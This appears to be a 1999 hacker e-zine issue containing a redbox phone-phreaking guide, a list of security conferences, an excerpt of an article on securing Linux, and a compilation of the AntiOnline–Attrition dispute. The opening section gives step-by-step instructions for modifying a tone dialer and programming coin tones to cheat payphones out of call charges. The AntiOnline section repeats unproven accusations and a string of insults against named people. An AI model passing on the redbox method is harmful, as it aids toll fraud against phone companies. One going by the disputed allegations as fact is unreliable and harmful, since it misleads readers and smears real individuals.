A.There are a lot of text files out there that trys to explane how but,thay do not tell
you how to program the tones.So me and teliepimp wrote this for the pepole that want
to know how to make one and program the tones.
Alright this is gonna be a quick and easy to understand artical on how to make and
program a redbox.
Go to radioshack and ask to buy a 43-141 tonedialar old 33mem one or a 43-146 tonedialar
new one. Once you have that go home and get a 6.5536mhz crystal it doesnt have to be
exactly this crystal but keep it in the 6.55mhz or at the very least 6.5mhz crystal
area. Right now you must modify the damn tone dialar.
Unscrew the screws an snap the case open an such then find the little thing that looks
like a capasitor or resister and solder it off. The capasitor is desguised as that its
actually a crystal it will say Z3.58M on it. Now take your new crystal an solder that on
it. All you got to do is put it back togeather and you are done with making it.
Now that you have that done its time to program the damn thing.
You should program a quarter tone than a dime tonean so on... just push the buttons as
stated below.
.25tone:
memory, *, *, *, *, *, 0memory then one of the P1 thats yer quarter tone
.10tone:
memory, *, *, memory, P2
.05tone:
memory, *, memory, P3
Alright now you have the three basic tones you can combine sequenses to get diffrent
things like a dollar and so on.
Now the phun part
Go to a payfone I think the ge ones will work or the SW bell or others work too.
Now this is the first way go up to the fone dial the # then when it says please put in
blah blah to help our profteering gluttonous organazation or some thang. Then play all
the tones you want then it should connect always try this method first just to test it
its easier then the other way but what the hell.
Ok right now the other way,
Call the opperator then have her dial the # then say you are going to pay with the
change in your hand for the call. Then put a nickel or some thing in just in case shes
still listening then play the tones not to fast just in case shes STILL listening.
EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
3.02 --=\\Conventions & Expo's\\=--
Here is a list of upcomming hacker/security conventions and meetings that you might
want to check out.
Beyond Hope
-Date: Aug 8-10 (1999)
-Location: New York City (USA)
-Homepage: http://www.hope.net/
--
World Conference on Information Security Education
-Date: June 17-19 (1999)
-Location: Stokholm, Sweden
-Homepage: http://www.dsv.su.se/WISE1/index2.html
--
NetSec '99 9th Annual Network Security in the Open Environment
-Date: June 14-16 (1999)
-Location: St Louis, Missouri (USA)
-Homepage: http://www.gocsi.com/conf.htm
--
11th FIRST Conference on Computer Security Incident Handling and Response
-Date: June 13-18 (1999)
-Location: Brisbane, Australia
-Homepage: http://www.first.org/conference/1999/
--
DefCon
-Date: July 9-11 (1999)
-Location: Las Vegas, Nevada (USA)
-Homepage: http://www.defcon.org/
Lord Oak
lordoak@thepoison.org
------------------------------
3.03 --=\\Securing Linux\\=--
(IDG) -- I'll say at the outset that I feel that the title
"Securing Linux" is somewhat misleading. It implies that one can
somehow go through a series of steps and emerge at the end with a
secure Linux system or network. That isn't true. The real intent of
this two-part series is to help you improve the security of your
system and to get you to think securely. One without the other is
unlikely to succeed.
Security is a state of mind
Ultimately, security isn't something that is achieved as an end
goal; it isn't a state. Rather, it's a way of setting up, maintaining
, and running an operating system, network, or environment. Secur-
ity is a process and a mind-set as well as a condition. It depends
on the day-to-day actions of the system or network's users and
system administrators. It also depends on the system security not
being so intrusive that it encourages users and administrators
alike to work around it.
MORE COMPUTING INTELLIGENCE
IDG.net home page
LinuxWorld's home page
LinuxWorld free e-mail alerts
LinuxWorld features & columns
Get Media Grok and The Industry Standard Intelligencer delivered
for free Reviews & in-depth info at IDG.net
IDG.net's personal news page
Year 2000 World
Questions about computers? Let IDG.net's editors help you
Subscribe to IDG.net's free daily newsletter for IT leaders
Search IDG.net in 12 languages
News Radio
Computerworld Minute
Fusion audio primers
But you have to start somewhere, and that somewhere is to improve
the security of your system as much as possible while still meeting
your operational needs. A system that isn't connected to any
network or phone lines and is kept in a locked room is reasonably
secure -- but it will meet few of your needs. From there we embark
on a series of compromises between the best possible security and
the least inconvenience and difficulty that will serve our purposes.
Some of these tips are specific to Linux systems, but many are very
general principles that apply to all systems and networks -- not
just to Unix (or Unix-like) OSs.
1.Less is more
Applying the Principle of least privilege and the Principle of
minimum access ensures that you open up your system to the least
amount of risk. Users are allowed only enough privilege and access
to do their work, and no more. More...
2.Planning
Plan ahead and plan to distribute services. Even before you begin
an installation (and, ideally, before you purchase system software
solutions), make a detailed plan of your intended security defenses
. On paper. More...
3.Installation
A secure system starts with a secure install.
This is one area where the various Linux distributions fail to do
an adequate job. All of the distributions are guilty of making it
too easy to set up insecure or misconfigured installations. Many of
them enable services that the new user is unlikely to be aware of,
or enable services before they are fully configured. More...
4.Secure services
Internet and network services are among the most vulnerable parts of
your system. Whether you're planning a new installation or
reviewing security on an existing system, your file servers, e-mail
services, Web servers, FTP, and other network services should be
among the first things you check for security holes. More...
5.Up and running
Once your system is set up, be sure to keep track of the services
you're running. Keep a close eye on services and applications by
monitoring your UDP and TCP ports. More...
6.Password and authentication security
Passwords can be the most underestimated security feature you have.
Make sure that neither you nor your users are using transparent
(easily guessed) passwords, and make sure that your passwords are
safe from unauthorized intruders. More...
7.Security and the privileged user
Never perform routine operations as root! Do your routine work as a
nonprivileged user and step up to root only when needed. This is a
common mistake of most newbies to Linux (and Unix in general). When
you (or a user or a program) must run as root, take the proper
security precautions. More...
8.Cryptography and security
Cryptography is a good thing. It can protect our files, our e-mail,
and our communications. Widespread use of cryptography will improve
and change the security landscape. Take advantage of cryptography
wherever its use is appropriate. More...
9.Eternal vigilance
Once you've secured your installation and checked your basic
security and services, your work isn't over. In fact, the job of
keeping your system secure is never over. Even if with eternal
vigilance, some risk remains, and it may still be possible for
someone, sometime to get in. With or without the help of any one
of a number of monitoring programs, you must keep a watchful eye
on what is going on in your system. More...
10.Stay informed
New security holes and bugs are discovered and exploited constantly
, and new techniques, patches, and fixes are created to counter the
threat they present. The only way to safeguard the system you've
worked so hard to secure is to stay on top of new information as it
becomes available. More...
The enemy within is ignorance
While advanced security can be difficult to implement, a great deal
can be achieved by taking the simple steps of knowing what you're
running and disabling services you aren't sure about. Even small
sites and single Linux systems can take steps to reduce the risk
and harden their security protection.
Not all of these ideas are ideal for all circumstances. You have to
understand and balance your security needs, your network design,
your functionality needs, and your security policy (if you have
one). In any case, knowledge is your best security tool and
ignorance is your worst enemy.
http://www.cnn.com/TECH/computing/9906/03/linux.ent.idg/
------------------------------
<!-- AO.00 - Info on AntiOnline //-->
Here is some information that I have collected from various sites and e-mails about the
JP and AntiOnline issues. At the end, this will also contain my opinion and other facts
that i have put together. All of these e-mails were taken from www.attrition.org and
all credit is given from where it was taken.
JP (owner of AntiOnline), is now giving away all of the information he has collected on
people to the FBI if they want it or if they want to sign up. We all know that JP has
had many interviews (wheather they are true or not, that is another thing), this could
be a major problem for some/many people. What he is doing is totally wrong and very
immature. He is mainly mad because knowone likes him and things like that. Either that
or he is just trying to get attention and to try to make 'new' friends. Well, if it was
for media attention, he sure got it, but the main thing is "is it good"? And also is it
"Because people are starting to like him and his site?". Well, I will let you figure
that out on your own.
AO.01 ~[www.wired.com]~
-----------------------
A Web site addressing computer hacking issues has accused a computer security pundit
of paying individuals to break into Web servers in exchange for exclusive coverage
of the stories that result.
John P. Vranesevich, editor of computer security magazine and resource center
AntiOnline, denies the charges.
Vranesevich is well known in the hacking and cracking community. He is often called
on by news media, including Wired News, to provide perspective on Web site break-
ins, viruses, and other security issues.
A report by the group Attrition.org, released Monday, accuses Vranesevich of paying
hackers to break into sites, thus guaranteeing him an exclusive on the stories.
"We've never paid for a story," Vranesevich said. "We don't even pay our reporters
for stories. [The allegations] are flat-out libelous and there's no proof to it.
It's an attempt to destroy, defame, and discredit me."
Vranesevich's detractors were already inflamed over his recent apparent shift in
allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated
he was working with the Air Force and other government agencies to help track down
crackers.
"A little note to the thousands of hackers that read this site," Vranesevich warned,
"I have been watching you these past five years. I know how you do the things you
do, why you do the things you do, and I know who you are."
His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by
the name Jericho). Martin said he has been following Vranesevich's case for more
than a year.
Martin based his claims on two emails that allegedly show Vranesevich had a business
relationship with "So1o," the hacker accused of breaking into senate.gov last year.
Vranesevich said the emails displayed on Martin's site "never existed."
-------------
AO.02 ~[E-mails from Attrition]~
--------------------------------
Here are 2 e-mails that Attrition recently recieved. They posted these e-mails on
their site, but JP and the rest of AntiOnline are saying they are lies and made up.
You can visit Attritions website at: www.attrition.org and I thank them very much
for suppling the information that they did.
-AO.01A [Email #1]
IMPLICATION:
Serious questions would arise if it was known that a company was funding
a person(s) to create problems in order for them to profit from solutions.
By hiring an active hacker responsible for breaking into various systems,
and then offering a product to help stop intruders, there is a direct
cause/effect relationship that leads to unethical profiting from inflated
and false threats of system intrusion. By having said hacker break into
a high profile web site, deface the web pages, and then offer 'exclusive'
"news", it presents the illusion of accurate and honest reporting, when
there was little or no news to begin with.
PROOF:
This mail from John Vranesevich shows that he and/or AntiOnline <b>IS</b> funding
the development of a product called "Local Secure".
---------- Forwarded message ----------
Received: from antionline.com ([209.166.177.36])
by phalse.2600.com (8.8.8/8.8.8) with SMTP id PAA27067
for (bronc@2600.com); Wed, 12 May 1999 15:02:29 -0400 (EDT)
Message-Id: <199905121902.PAA27067@phalse.2600.com>
Received: from bessie ([209.166.177.43]) by antionline.com ( IA Mail Server
Version: 2.3. Build: 10019 ) ) ; 12 May 1999 19:03:17 UT
X-Sender: jp@smtp.antionline.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0
Date: Wed, 12 May 1999 15:03:17 -0400
To: Bronc Buster (bronc@2600.com)
From: John Vranesevich (jp@AntiOnline.com)
Subject: Re: Information
In-Reply-To: (Pine.NEB.4.05.9905121444030.26886-100000@phalse.2600.com)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Greetings:
Haha, first off. "Local Secure" is a solaris vulnerability scanner that AntiOnline is having
commercially developed. ROFL "some secret 'spy' project". We had a small group of programmers contact
us about it, it looked cool, so we threw them a few bucks .
[snip...]
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
-------------
-AO.01B [E-mail #2]
IMPLICATION:
That an active hacker has a significant role in a company offering security
solutions. This behavior is an absolute 'no' in the world of security consulting.
If it is known that active hackers populate a security team, what guarantees
exist that they will behave ethically when doing consulting work on your network?
PROOF:
The following mail proves that "so1o", a.k.a Chris McNab holds a significant
position in Network Security Solutions Ltd.
---------- Forwarded message ----------
Received: from cc02mh.unity.ncsu.edu (cc02mh.unity.ncsu.edu [152.1.1.144])
by cc01mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA22054
for (jkwilli2@cc01mh.unity.ncsu.edu); Sun, 11 Apr 1999 12:22:24 -0400 (EDT)
From: chris@ns2.co.uk
Received: from netgates.co.uk (macmail.netgates.co.uk [194.105.64.74])
by cc02mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA18125
for (jkwilli2@unity.ncsu.edu); Sun, 11 Apr 1999 12:22:22 -0400 (EDT)
Received: from onyx.nss.cx (t@glm001 [193.9.120.4]) by netgates.co.uk
(8.7.5/8.x.x) with SMTP id RAA26418 for (jkwilli2@unity.ncsu.edu); Sun,
11 Apr 1999 17:22:29 +0100 (BST)
Message-ID: (2BC8B641.5DCB@ns2.co.uk)
Date: Sun, 11 Apr 1993 17:22:25 -0700
Organization: http://www.ns2.co.uk/about.html
X-Mailer: Mozilla 3.01 (Win95; I; 16bit)
MIME-Version: 1.0
To: Ken Williams (jkwilli2@unity.ncsu.edu)
Subject: Re: 2.6 md5's
References:
(Pine.SOL.4.05.9901061816020.10775-100000@ultra1-100lez.eos.ncsu.edu)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-UIDL: 90e8e8bdcef936724ed2ef7fd94a63f1
Hi Ken,
Chris (so1o) here again.. just asking for a quick favour (well, 2 mins
of work on your part, heh). After some hard-drive difficulties I've been
experiencing here, I've been trying to rebuild my exploit/tools
collections.
I was simply wondering if it would be possible for you to .tgz up the
*.c files in the
http://www.Genocide2600.com/~tattooman/Exploit_Code_Archive/ directory
on your site, I only really need the C source files, this will also keep
the .tgz's filesize down :-)
I would be _extremely_ grateful if you
could hook this up for me, maybe
you can put the files on an FTP at ncsu.edu or somewhere fast.
Take it easy,
Chris
--
Chris McNab |
Managing Director | Network Security Solutions Ltd.
| http://www.ns2.co.uk
-------------
AO.03 ~[AntiOnline's Response]~
-------------------------------
First off, for those of you that haven't read it, Brian Martin's Attrition website
has today posted allegations that AntiOnline funded the Whitehouse.gov and
Senate.gov hack so that we would have news to cover (However, I'm sure most of you
have read it by now, because of organizations, and I use the term loosely, like the
Hacker News Network).
Needless to say, when I went forward with the statement that AntiOnline was going to
help in the fight against malicious hackers, I expected some backlash from the
hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd
find myself with a $10,000 phone bill. But, they've apparently chosen something far
more creative.
First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in
connection with being a suspected member of the HFG (The group that hacked the New
York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into
dozens of sites (he calls himself a hacktivist). The fact that these two could
think, or at least think up, some grandiose scheme which involved AntiOnline bank-
rolling hackers, is not surprising. They have both lived their lives trying to
break, and evade, the law.
For some reason, Brian Martin has become obsessed over AntiOnline. His website has
dozens and dozens of pages of what he calls "errata" that he's written about it. He
takes information posted on our site out of context, then criticizes us because of
it. Many people have written in asking why we never posted any response to all of
the allegations he has on his site about us. Personally, it's because I felt that I
didn't need to justify myself, or my actions, to someone who is currently under FBI
investigation, and who has never done anything for the security scene other than
criticize others. I actually feel bad for him. The fact that he spends such a large
portion of his life trying to "bring down" others using lies, deceit, and twistings
of the truth, is sad in my eyes.
As for these allegations that I paid people to break into government sites so that I
could write a story. Let me just say, that such claims are so far fetched and pre-
posterous, I'm not even going to respond to them on a point by point basis.
It seems that almost all of the criticisms that I receive from people like Brian
Martin revolve around money. He says in his "allegations" about AntiOnline that
"During the past five years, AO has grown from a five megabyte hobby web site, into
a multi domain business venture with hundreds of thousands of dollars in venture
capital." Is that what he's so upset about? That I've made a ton of money? Well, let
me put his mind at ease. The point in fact, is that I don't now, nor have I ever in
my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of
thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say,
that our original funding was in the amount of $75,000. I am very proud of the
levels I have taken AntiOnline to with very little resources, and a lot of hard
work. On average, I put in 17 hour days working on the site and related matters. At
the age of 20, I'm trying to build a life long career for myself. So, to people like
Mr. Martin, let me just say that anything my site has accomplished has not, and tru-
ly couldn't have been, from me throwing money at it. It came from my love for what I
do, and my willingness to put in the time it takes to accomplish my dream.
In a way, I take these allegations that have come against me as a sign that I'm on
the right track with what I'm doing. If people like Brian Martin weren't yelling and
screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If
people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling
So, I'm going to view these recent allegations as a job well done letter from the
malicious hackers of the world.
I have always lived my life in a way which I was proud of, and I will continue to do
so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to con-
stantly be taking some sort of sick defensive on my site (Which is probably what
their intentions are). That's not its purpose. So, if they come out with some new
allegation, like I have secrets plans to assasinate the president with a herf gun or
something, you won't find a response to them from me here. As a matter of fact, you
won't find a response from me at all. I will let the work that I put forth, and the
actions that I take in my daily life, be my response.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
-------------
AO.04 ~[Added Comments]~
------------------------
Well my opinion on this topic is that JP is being totally immature. He is 'telling'
on people. People trusted him (kinda) to let him interview them and now he is
releasing all of that information about people. JP is releasing all of that infor-
mation to government and military officials. He said that he is 'against' our
illegal activity, but yet he claims he is a hacker? Yea OK. So he is a hacker
(supposedly), but yet turns on us? Wow, this makes him a trader along with being a
liar and immature.
He is totally gonna change the community. Now when someone wants to interview a
hacker, the hacker is gonna think 'Can I trust him/her?'. So basically there goes
MOST/A LOT of the interviews and the information that is supplied about people and
what goes on. He is being a total dick and a idiot. Wow, thats 2 more things we can
add to the list.
The one thing where I get lost is at: what makes a difference if he posts it on his
site where everyone can see it (including the government)? It doesn't, he is doing
it for the media/attention. Uh oh, we just added media wh0re to the list also! Since
we have come up with some characteristics of JP, lets take a look at them:
-Immature
-Tattle Tale
-Hypocriate
-Trader
-Liar
-Dick
-Idiot
-Media Wh0re
Wow thats a lot of things. I am sure I/we can come up with lots more but the server
doesn't have 7gigs to spare for a text file. Another reason is that why would i want
to waste my time writing up things about JP (characteristics)? I wouldn't want to
waste my time on him.
Most of you know I am not one to talk trash or bad about other people, but when it
comes to things like this, there is no way to help it. When someone is the things
listed above (all put together), that shows the person has lack of respect for any-
one and is in it all for the money (well greed was just added).
I am truely sorry to those who like AntiOnline and go there and wanted to read this
section about what I think of this situation. But mainly it is the truth, and there
is honestly no way out of it. The only things that MIGHT not be true are the e-mails
that were sent to Bronc Buster (posted on attrition), but that has not yet been
proven yet. And I personally think that they are true and really from him though
they might be modified SOME with things stretched and exagerated.
-Lord Oak
lordoak@thepoison.org
-------------
This portfolio of information about AntiOnline was put together by Lord Oak and every-
one was given credit from where I took the information from. Permission is needed before
copying this WHOLE AntiOnline document and not giving credit where it is due. Again, I
am sorry to those who like AntiOnline and go there and wanted to read this document. But
you have your opinions so please let me have mine (if you wanna think this is an
opinion).
Lord Oak
lordoak@thepoison.org
------------------------------
SAY.W
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #2- .
. .
. "Comeon guys, stop it or I am telling!" .
. -JayPeeAychEf (JPHF) .
. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to
pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and
click on it.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
